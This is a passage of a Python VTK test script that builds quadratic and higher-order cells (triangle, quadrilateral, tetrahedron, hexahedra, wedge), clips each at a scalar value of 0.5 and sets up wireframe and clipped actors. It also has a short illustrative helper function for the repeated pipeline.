edgeclips.SetValue(0.5)
aEdgeclipMapper = vtk.vtkDataSetMapper()
aEdgeclipMapper.SetInputConnection(edgeclips.GetOutputPort())
aEdgeclipMapper.ScalarVisibilityOff()
aEdgeMapper = vtk.vtkDataSetMapper()
aEdgeMapper.SetInputData(aEdgeGrid)
aEdgeMapper.ScalarVisibilityOff()
aEdgeActor = vtk.vtkActor()
aEdgeActor.SetMapper(aEdgeMapper)
aEdgeActor.GetProperty().SetRepresentationToWireframe()
aEdgeActor.GetProperty().SetAmbient(1.0)
aEdgeclipActor = vtk.vtkActor()
aEdgeclipActor.SetMapper(aEdgeclipMapper)
aEdgeclipActor.GetProperty().BackfaceCullingOn()
aEdgeclipActor.GetProperty().SetAmbient(1.0)
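# The grid -> clipper -> mapper -> actor sequence above is repeated verbatim for every
# cell type below. A small helper like this sketch (not part of the original test, shown
# only to illustrate the pattern) could build the wireframe/clipped actor pair for any grid:
def makeClippedActorPair(grid, value=0.5):
    clipper = vtk.vtkClipDataSet()
    clipper.SetInputData(grid)
    clipper.SetValue(value)
    clipMapper = vtk.vtkDataSetMapper()
    clipMapper.SetInputConnection(clipper.GetOutputPort())
    clipMapper.ScalarVisibilityOff()
    mapper = vtk.vtkDataSetMapper()
    mapper.SetInputData(grid)
    mapper.ScalarVisibilityOff()
    actor = vtk.vtkActor()
    actor.SetMapper(mapper)
    actor.GetProperty().SetRepresentationToWireframe()
    actor.GetProperty().SetAmbient(1.0)
    clipActor = vtk.vtkActor()
    clipActor.SetMapper(clipMapper)
    clipActor.GetProperty().SetAmbient(1.0)
    return actor, clipActor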
# Quadratic triangle
triPoints = vtk.vtkPoints()
triPoints.SetNumberOfPoints(6)
triPoints.InsertPoint(0, 0.0, 0.0, 0.0)
triPoints.InsertPoint(1, 1.0, 0.0, 0.0)
triPoints.InsertPoint(2, 0.5, 0.8, 0.0)
triPoints.InsertPoint(3, 0.5, 0.0, 0.0)
triPoints.InsertPoint(4, 0.75, 0.4, 0.0)
triPoints.InsertPoint(5, 0.25, 0.4, 0.0)
triScalars = vtk.vtkFloatArray()
triScalars.SetNumberOfTuples(6)
triScalars.InsertValue(0, 0.0)
triScalars.InsertValue(1, 0.0)
triScalars.InsertValue(2, 0.0)
triScalars.InsertValue(3, 1.0)
triScalars.InsertValue(4, 0.0)
triScalars.InsertValue(5, 0.0)
aTri = vtk.vtkQuadraticTriangle()
aTri.GetPointIds().SetId(0, 0)
aTri.GetPointIds().SetId(1, 1)
aTri.GetPointIds().SetId(2, 2)
aTri.GetPointIds().SetId(3, 3)
aTri.GetPointIds().SetId(4, 4)
aTri.GetPointIds().SetId(5, 5)
aTriGrid = vtk.vtkUnstructuredGrid()
aTriGrid.Allocate(1, 1)
aTriGrid.InsertNextCell(aTri.GetCellType(), aTri.GetPointIds())
aTriGrid.SetPoints(triPoints)
aTriGrid.GetPointData().SetScalars(triScalars)
triclips = vtk.vtkClipDataSet()
triclips.SetInputData(aTriGrid)
triclips.SetValue(0.5)
aTriclipMapper = vtk.vtkDataSetMapper()
aTriclipMapper.SetInputConnection(triclips.GetOutputPort())
aTriclipMapper.ScalarVisibilityOff()
aTriMapper = vtk.vtkDataSetMapper()
aTriMapper.SetInputData(aTriGrid)
aTriMapper.ScalarVisibilityOff()
aTriActor = vtk.vtkActor()
aTriActor.SetMapper(aTriMapper)
aTriActor.GetProperty().SetRepresentationToWireframe()
aTriActor.GetProperty().SetAmbient(1.0)
aTriclipActor = vtk.vtkActor()
aTriclipActor.SetMapper(aTriclipMapper)
aTriclipActor.GetProperty().BackfaceCullingOn()
aTriclipActor.GetProperty().SetAmbient(1.0)
# Quadratic quadrilateral
quadPoints = vtk.vtkPoints()
quadPoints.SetNumberOfPoints(8)
quadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
quadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
quadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
quadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
quadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
quadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
quadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
quadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
quadScalars = vtk.vtkFloatArray()
quadScalars.SetNumberOfTuples(8)
quadScalars.InsertValue(0, 0.0)
quadScalars.InsertValue(1, 0.0)
quadScalars.InsertValue(2, 1.0)
quadScalars.InsertValue(3, 1.0)
quadScalars.InsertValue(4, 1.0)
quadScalars.InsertValue(5, 0.0)
quadScalars.InsertValue(6, 0.0)
quadScalars.InsertValue(7, 0.0)
aQuad = vtk.vtkQuadraticQuad()
aQuad.GetPointIds().SetId(0, 0)
aQuad.GetPointIds().SetId(1, 1)
aQuad.GetPointIds().SetId(2, 2)
aQuad.GetPointIds().SetId(3, 3)
aQuad.GetPointIds().SetId(4, 4)
aQuad.GetPointIds().SetId(5, 5)
aQuad.GetPointIds().SetId(6, 6)
aQuad.GetPointIds().SetId(7, 7)
aQuadGrid = vtk.vtkUnstructuredGrid()
aQuadGrid.Allocate(1, 1)
aQuadGrid.InsertNextCell(aQuad.GetCellType(), aQuad.GetPointIds())
aQuadGrid.SetPoints(quadPoints)
aQuadGrid.GetPointData().SetScalars(quadScalars)
quadclips = vtk.vtkClipDataSet()
quadclips.SetInputData(aQuadGrid)
quadclips.SetValue(0.5)
aQuadclipMapper = vtk.vtkDataSetMapper()
aQuadclipMapper.SetInputConnection(quadclips.GetOutputPort())
aQuadclipMapper.ScalarVisibilityOff()
aQuadMapper = vtk.vtkDataSetMapper()
aQuadMapper.SetInputData(aQuadGrid)
aQuadMapper.ScalarVisibilityOff()
aQuadActor = vtk.vtkActor()
aQuadActor.SetMapper(aQuadMapper)
aQuadActor.GetProperty().SetRepresentationToWireframe()
aQuadActor.GetProperty().SetAmbient(1.0)
aQuadclipActor = vtk.vtkActor()
aQuadclipActor.SetMapper(aQuadclipMapper)
aQuadclipActor.GetProperty().BackfaceCullingOn()
aQuadclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic quadrilateral
BquadPoints = vtk.vtkPoints()
BquadPoints.SetNumberOfPoints(9)
BquadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
BquadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
BquadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
BquadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
BquadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
BquadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
BquadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
BquadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
BquadPoints.InsertPoint(8, 0.5, 0.5, 0.0)
BquadScalars = vtk.vtkFloatArray()
BquadScalars.SetNumberOfTuples(9)
BquadScalars.InsertValue(0, 1.0)
BquadScalars.InsertValue(1, 1.0)
BquadScalars.InsertValue(2, 1.0)
BquadScalars.InsertValue(3, 1.0)
BquadScalars.InsertValue(4, 0.0)
BquadScalars.InsertValue(5, 0.0)
BquadScalars.InsertValue(6, 0.0)
BquadScalars.InsertValue(7, 0.0)
BquadScalars.InsertValue(8, 1.0)
BQuad = vtk.vtkBiQuadraticQuad()
BQuad.GetPointIds().SetId(0, 0)
BQuad.GetPointIds().SetId(1, 1)
BQuad.GetPointIds().SetId(2, 2)
BQuad.GetPointIds().SetId(3, 3)
BQuad.GetPointIds().SetId(4, 4)
BQuad.GetPointIds().SetId(5, 5)
BQuad.GetPointIds().SetId(6, 6)
BQuad.GetPointIds().SetId(7, 7)
BQuad.GetPointIds().SetId(8, 8)
BQuadGrid = vtk.vtkUnstructuredGrid()
BQuadGrid.Allocate(1, 1)
BQuadGrid.InsertNextCell(BQuad.GetCellType(), BQuad.GetPointIds())
BQuadGrid.SetPoints(BquadPoints)
BQuadGrid.GetPointData().SetScalars(BquadScalars)
Bquadclips = vtk.vtkClipDataSet()
Bquadclips.SetInputData(BQuadGrid)
Bquadclips.SetValue(0.5)
BQuadclipMapper = vtk.vtkDataSetMapper()
BQuadclipMapper.SetInputConnection(Bquadclips.GetOutputPort())
BQuadclipMapper.ScalarVisibilityOff()
BQuadMapper = vtk.vtkDataSetMapper()
BQuadMapper.SetInputData(BQuadGrid)
BQuadMapper.ScalarVisibilityOff()
BQuadActor = vtk.vtkActor()
BQuadActor.SetMapper(BQuadMapper)
BQuadActor.GetProperty().SetRepresentationToWireframe()
BQuadActor.GetProperty().SetAmbient(1.0)
BQuadclipActor = vtk.vtkActor()
BQuadclipActor.SetMapper(BQuadclipMapper)
BQuadclipActor.GetProperty().BackfaceCullingOn()
BQuadclipActor.GetProperty().SetAmbient(1.0)
# Quadratic linear quadrilateral
QLquadPoints = vtk.vtkPoints()
QLquadPoints.SetNumberOfPoints(6)
QLquadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
QLquadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
QLquadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
QLquadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
QLquadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
QLquadPoints.InsertPoint(5, 0.5, 1.0, 0.0)
QLquadScalars = vtk.vtkFloatArray()
QLquadScalars.SetNumberOfTuples(6)
QLquadScalars.InsertValue(0, 1.0)
QLquadScalars.InsertValue(1, 1.0)
QLquadScalars.InsertValue(2, 0.0)
QLquadScalars.InsertValue(3, 0.0)
QLquadScalars.InsertValue(4, 0.0)
QLquadScalars.InsertValue(5, 1.0)
QLQuad = vtk.vtkQuadraticLinearQuad()
QLQuad.GetPointIds().SetId(0, 0)
QLQuad.GetPointIds().SetId(1, 1)
QLQuad.GetPointIds().SetId(2, 2)
QLQuad.GetPointIds().SetId(3, 3)
QLQuad.GetPointIds().SetId(4, 4)
QLQuad.GetPointIds().SetId(5, 5)
QLQuadGrid = vtk.vtkUnstructuredGrid()
QLQuadGrid.Allocate(1, 1)
QLQuadGrid.InsertNextCell(QLQuad.GetCellType(), QLQuad.GetPointIds())
QLQuadGrid.SetPoints(QLquadPoints)
QLQuadGrid.GetPointData().SetScalars(QLquadScalars)
QLquadclips = vtk.vtkClipDataSet()
QLquadclips.SetInputData(QLQuadGrid)
QLquadclips.SetValue(0.5)
QLQuadclipMapper = vtk.vtkDataSetMapper()
QLQuadclipMapper.SetInputConnection(QLquadclips.GetOutputPort())
QLQuadclipMapper.ScalarVisibilityOff()
QLQuadMapper = vtk.vtkDataSetMapper()
QLQuadMapper.SetInputData(QLQuadGrid)
QLQuadMapper.ScalarVisibilityOff()
QLQuadActor = vtk.vtkActor()
QLQuadActor.SetMapper(QLQuadMapper)
QLQuadActor.GetProperty().SetRepresentationToWireframe()
QLQuadActor.GetProperty().SetAmbient(1.0)
QLQuadclipActor = vtk.vtkActor()
QLQuadclipActor.SetMapper(QLQuadclipMapper)
QLQuadclipActor.GetProperty().BackfaceCullingOn()
QLQuadclipActor.GetProperty().SetAmbient(1.0)
# Quadratic tetrahedron
tetPoints = vtk.vtkPoints()
tetPoints.SetNumberOfPoints(10)
tetPoints.InsertPoint(0, 0.0, 0.0, 0.0)
tetPoints.InsertPoint(1, 1.0, 0.0, 0.0)
tetPoints.InsertPoint(2, 0.5, 0.8, 0.0)
tetPoints.InsertPoint(3, 0.5, 0.4, 1.0)
tetPoints.InsertPoint(4, 0.5, 0.0, 0.0)
tetPoints.InsertPoint(5, 0.75, 0.4, 0.0)
tetPoints.InsertPoint(6, 0.25, 0.4, 0.0)
tetPoints.InsertPoint(7, 0.25, 0.2, 0.5)
tetPoints.InsertPoint(8, 0.75, 0.2, 0.5)
tetPoints.InsertPoint(9, 0.50, 0.6, 0.5)
tetScalars = vtk.vtkFloatArray()
tetScalars.SetNumberOfTuples(10)
tetScalars.InsertValue(0, 1.0)
tetScalars.InsertValue(1, 1.0)
tetScalars.InsertValue(2, 1.0)
tetScalars.InsertValue(3, 1.0)
tetScalars.InsertValue(4, 0.0)
tetScalars.InsertValue(5, 0.0)
tetScalars.InsertValue(6, 0.0)
tetScalars.InsertValue(7, 0.0)
tetScalars.InsertValue(8, 0.0)
tetScalars.InsertValue(9, 0.0)
aTet = vtk.vtkQuadraticTetra()
aTet.GetPointIds().SetId(0, 0)
aTet.GetPointIds().SetId(1, 1)
aTet.GetPointIds().SetId(2, 2)
aTet.GetPointIds().SetId(3, 3)
aTet.GetPointIds().SetId(4, 4)
aTet.GetPointIds().SetId(5, 5)
aTet.GetPointIds().SetId(6, 6)
aTet.GetPointIds().SetId(7, 7)
aTet.GetPointIds().SetId(8, 8)
aTet.GetPointIds().SetId(9, 9)
aTetGrid = vtk.vtkUnstructuredGrid()
aTetGrid.Allocate(1, 1)
aTetGrid.InsertNextCell(aTet.GetCellType(), aTet.GetPointIds())
aTetGrid.SetPoints(tetPoints)
aTetGrid.GetPointData().SetScalars(tetScalars)
tetclips = vtk.vtkClipDataSet()
tetclips.SetInputData(aTetGrid)
tetclips.SetValue(0.5)
aTetclipMapper = vtk.vtkDataSetMapper()
aTetclipMapper.SetInputConnection(tetclips.GetOutputPort())
aTetclipMapper.ScalarVisibilityOff()
aTetMapper = vtk.vtkDataSetMapper()
aTetMapper.SetInputData(aTetGrid)
aTetMapper.ScalarVisibilityOff()
aTetActor = vtk.vtkActor()
aTetActor.SetMapper(aTetMapper)
aTetActor.GetProperty().SetRepresentationToWireframe()
aTetActor.GetProperty().SetAmbient(1.0)
aTetclipActor = vtk.vtkActor()
aTetclipActor.SetMapper(aTetclipMapper)
aTetclipActor.GetProperty().SetAmbient(1.0)
# Quadratic hexahedron
hexPoints = vtk.vtkPoints()
hexPoints.SetNumberOfPoints(20)
hexPoints.InsertPoint(0, 0, 0, 0)
hexPoints.InsertPoint(1, 1, 0, 0)
hexPoints.InsertPoint(2, 1, 1, 0)
hexPoints.InsertPoint(3, 0, 1, 0)
hexPoints.InsertPoint(4, 0, 0, 1)
hexPoints.InsertPoint(5, 1, 0, 1)
hexPoints.InsertPoint(6, 1, 1, 1)
hexPoints.InsertPoint(7, 0, 1, 1)
hexPoints.InsertPoint(8, 0.5, 0, 0)
hexPoints.InsertPoint(9, 1, 0.5, 0)
hexPoints.InsertPoint(10, 0.5, 1, 0)
hexPoints.InsertPoint(11, 0, 0.5, 0)
hexPoints.InsertPoint(12, 0.5, 0, 1)
hexPoints.InsertPoint(13, 1, 0.5, 1)
hexPoints.InsertPoint(14, 0.5, 1, 1)
hexPoints.InsertPoint(15, 0, 0.5, 1)
hexPoints.InsertPoint(16, 0, 0, 0.5)
hexPoints.InsertPoint(17, 1, 0, 0.5)
hexPoints.InsertPoint(18, 1, 1, 0.5)
hexPoints.InsertPoint(19, 0, 1, 0.5)
hexScalars = vtk.vtkFloatArray()
hexScalars.SetNumberOfTuples(20)
hexScalars.InsertValue(0, 1.0)
hexScalars.InsertValue(1, 1.0)
hexScalars.InsertValue(2, 1.0)
hexScalars.InsertValue(3, 1.0)
hexScalars.InsertValue(4, 1.0)
hexScalars.InsertValue(5, 1.0)
hexScalars.InsertValue(6, 1.0)
hexScalars.InsertValue(7, 1.0)
hexScalars.InsertValue(8, 0.0)
hexScalars.InsertValue(9, 0.0)
hexScalars.InsertValue(10, 0.0)
hexScalars.InsertValue(11, 0.0)
hexScalars.InsertValue(12, 0.0)
hexScalars.InsertValue(13, 0.0)
hexScalars.InsertValue(14, 0.0)
hexScalars.InsertValue(15, 0.0)
hexScalars.InsertValue(16, 0.0)
hexScalars.InsertValue(17, 0.0)
hexScalars.InsertValue(18, 0.0)
hexScalars.InsertValue(19, 0.0)
aHex = vtk.vtkQuadraticHexahedron()
aHex.GetPointIds().SetId(0, 0)
aHex.GetPointIds().SetId(1, 1)
aHex.GetPointIds().SetId(2, 2)
aHex.GetPointIds().SetId(3, 3)
aHex.GetPointIds().SetId(4, 4)
aHex.GetPointIds().SetId(5, 5)
aHex.GetPointIds().SetId(6, 6)
aHex.GetPointIds().SetId(7, 7)
aHex.GetPointIds().SetId(8, 8)
aHex.GetPointIds().SetId(9, 9)
aHex.GetPointIds().SetId(10, 10)
aHex.GetPointIds().SetId(11, 11)
aHex.GetPointIds().SetId(12, 12)
aHex.GetPointIds().SetId(13, 13)
aHex.GetPointIds().SetId(14, 14)
aHex.GetPointIds().SetId(15, 15)
aHex.GetPointIds().SetId(16, 16)
aHex.GetPointIds().SetId(17, 17)
aHex.GetPointIds().SetId(18, 18)
aHex.GetPointIds().SetId(19, 19)
aHexGrid = vtk.vtkUnstructuredGrid()
aHexGrid.Allocate(1, 1)
aHexGrid.InsertNextCell(aHex.GetCellType(), aHex.GetPointIds())
aHexGrid.SetPoints(hexPoints)
aHexGrid.GetPointData().SetScalars(hexScalars)
hexclips = vtk.vtkClipDataSet()
hexclips.SetInputData(aHexGrid)
hexclips.SetValue(0.5)
aHexclipMapper = vtk.vtkDataSetMapper()
aHexclipMapper.SetInputConnection(hexclips.GetOutputPort())
aHexclipMapper.ScalarVisibilityOff()
aHexMapper = vtk.vtkDataSetMapper()
aHexMapper.SetInputData(aHexGrid)
aHexMapper.ScalarVisibilityOff()
aHexActor = vtk.vtkActor()
aHexActor.SetMapper(aHexMapper)
aHexActor.GetProperty().SetRepresentationToWireframe()
aHexActor.GetProperty().SetAmbient(1.0)
aHexclipActor = vtk.vtkActor()
aHexclipActor.SetMapper(aHexclipMapper)
aHexclipActor.GetProperty().SetAmbient(1.0)
# TriQuadratic hexahedron
TQhexPoints = vtk.vtkPoints()
TQhexPoints.SetNumberOfPoints(27)
TQhexPoints.InsertPoint(0, 0, 0, 0)
TQhexPoints.InsertPoint(1, 1, 0, 0)
TQhexPoints.InsertPoint(2, 1, 1, 0)
TQhexPoints.InsertPoint(3, 0, 1, 0)
TQhexPoints.InsertPoint(4, 0, 0, 1)
TQhexPoints.InsertPoint(5, 1, 0, 1)
TQhexPoints.InsertPoint(6, 1, 1, 1)
TQhexPoints.InsertPoint(7, 0, 1, 1)
TQhexPoints.InsertPoint(8, 0.5, 0, 0)
TQhexPoints.InsertPoint(9, 1, 0.5, 0)
TQhexPoints.InsertPoint(10, 0.5, 1, 0)
TQhexPoints.InsertPoint(11, 0, 0.5, 0)
TQhexPoints.InsertPoint(12, 0.5, 0, 1)
TQhexPoints.InsertPoint(13, 1, 0.5, 1)
TQhexPoints.InsertPoint(14, 0.5, 1, 1)
TQhexPoints.InsertPoint(15, 0, 0.5, 1)
TQhexPoints.InsertPoint(16, 0, 0, 0.5)
TQhexPoints.InsertPoint(17, 1, 0, 0.5)
TQhexPoints.InsertPoint(18, 1, 1, 0.5)
TQhexPoints.InsertPoint(19, 0, 1, 0.5)
TQhexPoints.InsertPoint(22, 0.5, 0, 0.5)
TQhexPoints.InsertPoint(21, 1, 0.5, 0.5)
TQhexPoints.InsertPoint(23, 0.5, 1, 0.5)
TQhexPoints.InsertPoint(20, 0, 0.5, 0.5)
TQhexPoints.InsertPoint(24, 0.5, 0.5, 0.0)
TQhexPoints.InsertPoint(25, 0.5, 0.5, 1)
TQhexPoints.InsertPoint(26, 0.5, 0.5, 0.5)
TQhexScalars = vtk.vtkFloatArray()
TQhexScalars.SetNumberOfTuples(27)
TQhexScalars.InsertValue(0, 1.0)
TQhexScalars.InsertValue(1, 1.0)
TQhexScalars.InsertValue(2, 1.0)
TQhexScalars.InsertValue(3, 1.0)
TQhexScalars.InsertValue(4, 1.0)
TQhexScalars.InsertValue(5, 1.0)
TQhexScalars.InsertValue(6, 1.0)
TQhexScalars.InsertValue(7, 1.0)
TQhexScalars.InsertValue(8, 0.0)
TQhexScalars.InsertValue(9, 0.0)
TQhexScalars.InsertValue(10, 0.0)
TQhexScalars.InsertValue(11, 0.0)
TQhexScalars.InsertValue(12, 0.0)
TQhexScalars.InsertValue(13, 0.0)
TQhexScalars.InsertValue(14, 0.0)
TQhexScalars.InsertValue(15, 0.0)
TQhexScalars.InsertValue(16, 0.0)
TQhexScalars.InsertValue(17, 0.0)
TQhexScalars.InsertValue(18, 0.0)
TQhexScalars.InsertValue(19, 0.0)
TQhexScalars.InsertValue(20, 0.0)
TQhexScalars.InsertValue(21, 0.0)
TQhexScalars.InsertValue(22, 0.0)
TQhexScalars.InsertValue(23, 0.0)
TQhexScalars.InsertValue(24, 0.0)
TQhexScalars.InsertValue(25, 0.0)
TQhexScalars.InsertValue(26, 0.0)
TQHex = vtk.vtkTriQuadraticHexahedron()
TQHex.GetPointIds().SetId(0, 0)
TQHex.GetPointIds().SetId(1, 1)
TQHex.GetPointIds().SetId(2, 2)
TQHex.GetPointIds().SetId(3, 3)
TQHex.GetPointIds().SetId(4, 4)
TQHex.GetPointIds().SetId(5, 5)
TQHex.GetPointIds().SetId(6, 6)
TQHex.GetPointIds().SetId(7, 7)
TQHex.GetPointIds().SetId(8, 8)
TQHex.GetPointIds().SetId(9, 9)
TQHex.GetPointIds().SetId(10, 10)
TQHex.GetPointIds().SetId(11, 11)
TQHex.GetPointIds().SetId(12, 12)
TQHex.GetPointIds().SetId(13, 13)
TQHex.GetPointIds().SetId(14, 14)
TQHex.GetPointIds().SetId(15, 15)
TQHex.GetPointIds().SetId(16, 16)
TQHex.GetPointIds().SetId(17, 17)
TQHex.GetPointIds().SetId(18, 18)
TQHex.GetPointIds().SetId(19, 19)
TQHex.GetPointIds().SetId(20, 20)
TQHex.GetPointIds().SetId(21, 21)
TQHex.GetPointIds().SetId(22, 22)
TQHex.GetPointIds().SetId(23, 23)
TQHex.GetPointIds().SetId(24, 24)
TQHex.GetPointIds().SetId(25, 25)
TQHex.GetPointIds().SetId(26, 26)
TQHexGrid = vtk.vtkUnstructuredGrid()
TQHexGrid.Allocate(1, 1)
TQHexGrid.InsertNextCell(TQHex.GetCellType(), TQHex.GetPointIds())
TQHexGrid.SetPoints(TQhexPoints)
TQHexGrid.GetPointData().SetScalars(TQhexScalars)
TQhexclips = vtk.vtkClipDataSet()
TQhexclips.SetInputData(TQHexGrid)
TQhexclips.SetValue(0.5)
TQHexclipMapper = vtk.vtkDataSetMapper()
TQHexclipMapper.SetInputConnection(TQhexclips.GetOutputPort())
TQHexclipMapper.ScalarVisibilityOff()
TQHexMapper = vtk.vtkDataSetMapper()
TQHexMapper.SetInputData(TQHexGrid)
TQHexMapper.ScalarVisibilityOff()
TQHexActor = vtk.vtkActor()
TQHexActor.SetMapper(TQHexMapper)
TQHexActor.GetProperty().SetRepresentationToWireframe()
TQHexActor.GetProperty().SetAmbient(1.0)
TQHexclipActor = vtk.vtkActor()
TQHexclipActor.SetMapper(TQHexclipMapper)
TQHexclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic Quadratic hexahedron
BQhexPoints = vtk.vtkPoints()
BQhexPoints.SetNumberOfPoints(24)
BQhexPoints.InsertPoint(0, 0, 0, 0)
BQhexPoints.InsertPoint(1, 1, 0, 0)
BQhexPoints.InsertPoint(2, 1, 1, 0)
BQhexPoints.InsertPoint(3, 0, 1, 0)
BQhexPoints.InsertPoint(4, 0, 0, 1)
BQhexPoints.InsertPoint(5, 1, 0, 1)
BQhexPoints.InsertPoint(6, 1, 1, 1)
BQhexPoints.InsertPoint(7, 0, 1, 1)
BQhexPoints.InsertPoint(8, 0.5, 0, 0)
BQhexPoints.InsertPoint(9, 1, 0.5, 0)
BQhexPoints.InsertPoint(10, 0.5, 1, 0)
BQhexPoints.InsertPoint(11, 0, 0.5, 0)
BQhexPoints.InsertPoint(12, 0.5, 0, 1)
BQhexPoints.InsertPoint(13, 1, 0.5, 1)
BQhexPoints.InsertPoint(14, 0.5, 1, 1)
BQhexPoints.InsertPoint(15, 0, 0.5, 1)
BQhexPoints.InsertPoint(16, 0, 0, 0.5)
BQhexPoints.InsertPoint(17, 1, 0, 0.5)
BQhexPoints.InsertPoint(18, 1, 1, 0.5)
BQhexPoints.InsertPoint(19, 0, 1, 0.5)
BQhexPoints.InsertPoint(22, 0.5, 0, 0.5)
BQhexPoints.InsertPoint(21, 1, 0.5, 0.5)
BQhexPoints.InsertPoint(23, 0.5, 1, 0.5)
BQhexPoints.InsertPoint(20, 0, 0.5, 0.5)
BQhexScalars = vtk.vtkFloatArray()
BQhexScalars.SetNumberOfTuples(24)
BQhexScalars.InsertValue(0, 1.0)
BQhexScalars.InsertValue(1, 1.0)
BQhexScalars.InsertValue(2, 1.0)
BQhexScalars.InsertValue(3, 1.0)
BQhexScalars.InsertValue(4, 1.0)
BQhexScalars.InsertValue(5, 1.0)
BQhexScalars.InsertValue(6, 1.0)
BQhexScalars.InsertValue(7, 1.0)
BQhexScalars.InsertValue(8, 0.0)
BQhexScalars.InsertValue(9, 0.0)
BQhexScalars.InsertValue(10, 0.0)
BQhexScalars.InsertValue(11, 0.0)
BQhexScalars.InsertValue(12, 0.0)
BQhexScalars.InsertValue(13, 0.0)
BQhexScalars.InsertValue(14, 0.0)
BQhexScalars.InsertValue(15, 0.0)
BQhexScalars.InsertValue(16, 0.0)
BQhexScalars.InsertValue(17, 0.0)
BQhexScalars.InsertValue(18, 0.0)
BQhexScalars.InsertValue(19, 0.0)
BQhexScalars.InsertValue(20, 0.0)
BQhexScalars.InsertValue(21, 0.0)
BQhexScalars.InsertValue(22, 0.0)
BQhexScalars.InsertValue(23, 0.0)
BQHex = vtk.vtkBiQuadraticQuadraticHexahedron()
BQHex.GetPointIds().SetId(0, 0)
BQHex.GetPointIds().SetId(1, 1)
BQHex.GetPointIds().SetId(2, 2)
BQHex.GetPointIds().SetId(3, 3)
BQHex.GetPointIds().SetId(4, 4)
BQHex.GetPointIds().SetId(5, 5)
BQHex.GetPointIds().SetId(6, 6)
BQHex.GetPointIds().SetId(7, 7)
BQHex.GetPointIds().SetId(8, 8)
BQHex.GetPointIds().SetId(9, 9)
BQHex.GetPointIds().SetId(10, 10)
BQHex.GetPointIds().SetId(11, 11)
BQHex.GetPointIds().SetId(12, 12)
BQHex.GetPointIds().SetId(13, 13)
BQHex.GetPointIds().SetId(14, 14)
BQHex.GetPointIds().SetId(15, 15)
BQHex.GetPointIds().SetId(16, 16)
BQHex.GetPointIds().SetId(17, 17)
BQHex.GetPointIds().SetId(18, 18)
BQHex.GetPointIds().SetId(19, 19)
BQHex.GetPointIds().SetId(20, 20)
BQHex.GetPointIds().SetId(21, 21)
BQHex.GetPointIds().SetId(22, 22)
BQHex.GetPointIds().SetId(23, 23)
BQHexGrid = vtk.vtkUnstructuredGrid()
BQHexGrid.Allocate(1, 1)
BQHexGrid.InsertNextCell(BQHex.GetCellType(), BQHex.GetPointIds())
BQHexGrid.SetPoints(BQhexPoints)
BQHexGrid.GetPointData().SetScalars(BQhexScalars)
BQhexclips = vtk.vtkClipDataSet()
BQhexclips.SetInputData(BQHexGrid)
BQhexclips.SetValue(0.5)
BQHexclipMapper = vtk.vtkDataSetMapper()
BQHexclipMapper.SetInputConnection(BQhexclips.GetOutputPort())
BQHexclipMapper.ScalarVisibilityOff()
BQHexMapper = vtk.vtkDataSetMapper()
BQHexMapper.SetInputData(BQHexGrid)
BQHexMapper.ScalarVisibilityOff()
BQHexActor = vtk.vtkActor()
BQHexActor.SetMapper(BQHexMapper)
BQHexActor.GetProperty().SetRepresentationToWireframe()
BQHexActor.GetProperty().SetAmbient(1.0)
BQHexclipActor = vtk.vtkActor()
BQHexclipActor.SetMapper(BQHexclipMapper)
BQHexclipActor.GetProperty().SetAmbient(1.0)
# Quadratic wedge
wedgePoints = vtk.vtkPoints()
wedgePoints.SetNumberOfPoints(15)
wedgePoints.InsertPoint(0, 0, 0, 0)
wedgePoints.InsertPoint(1, 1, 0, 0)
wedgePoints.InsertPoint(2, 0, 1, 0)
wedgePoints.InsertPoint(3, 0, 0, 1)
wedgePoints.InsertPoint(4, 1, 0, 1)
wedgePoints.InsertPoint(5, 0, 1, 1)
wedgePoints.InsertPoint(6, 0.5, 0, 0)
wedgePoints.InsertPoint(7, 0.5, 0.5, 0)
wedgePoints.InsertPoint(8, 0, 0.5, 0)
wedgePoints.InsertPoint(9, 0.5, 0, 1)
wedgePoints.InsertPoint(10, 0.5, 0.5, 1)
wedgePoints.InsertPoint(11, 0, 0.5, 1)
wedgePoints.InsertPoint(12, 0, 0, 0.5)
wedgePoints.InsertPoint(13, 1, 0, 0.5)
wedgePoints.InsertPoint(14, 0, 1, 0.5)
wedgeScalars = vtk.vtkFloatArray()
wedgeScalars.SetNumberOfTuples(15)
wedgeScalars.InsertValue(0, 1.0)
wedgeScalars.InsertValue(1, 1.0)
wedgeScalars.InsertValue(2, 1.0)
wedgeScalars.InsertValue(3, 1.0)
wedgeScalars.InsertValue(4, 1.0)
wedgeScalars.InsertValue(5, 1.0)
wedgeScalars.InsertValue(6, 0.0)
wedgeScalars.InsertValue(7, 0.0)
wedgeScalars.InsertValue(8, 0.0)
wedgeScalars.InsertValue(9, 0.0)
wedgeScalars.InsertValue(10, 0.0)
wedgeScalars.InsertValue(11, 0.0)
wedgeScalars.InsertValue(12, 0.0)
wedgeScalars.InsertValue(13, 0.0)
wedgeScalars.InsertValue(14, 0.0)
aWedge = vtk.vtkQuadraticWedge()
aWedge.GetPointIds().SetId(0, 0)
aWedge.GetPointIds().SetId(1, 1)
aWedge.GetPointIds().SetId(2, 2)
aWedge.GetPointIds().SetId(3, 3)
aWedge.GetPointIds().SetId(4, 4)
aWedge.GetPointIds().SetId(5, 5)
aWedge.GetPointIds().SetId(6, 6)
aWedge.GetPointIds().SetId(7, 7)
aWedge.GetPointIds().SetId(8, 8)
aWedge.GetPointIds().SetId(9, 9)
aWedge.GetPointIds().SetId(10, 10)
aWedge.GetPointIds().SetId(11, 11)
aWedge.GetPointIds().SetId(12, 12)
aWedge.GetPointIds().SetId(13, 13)
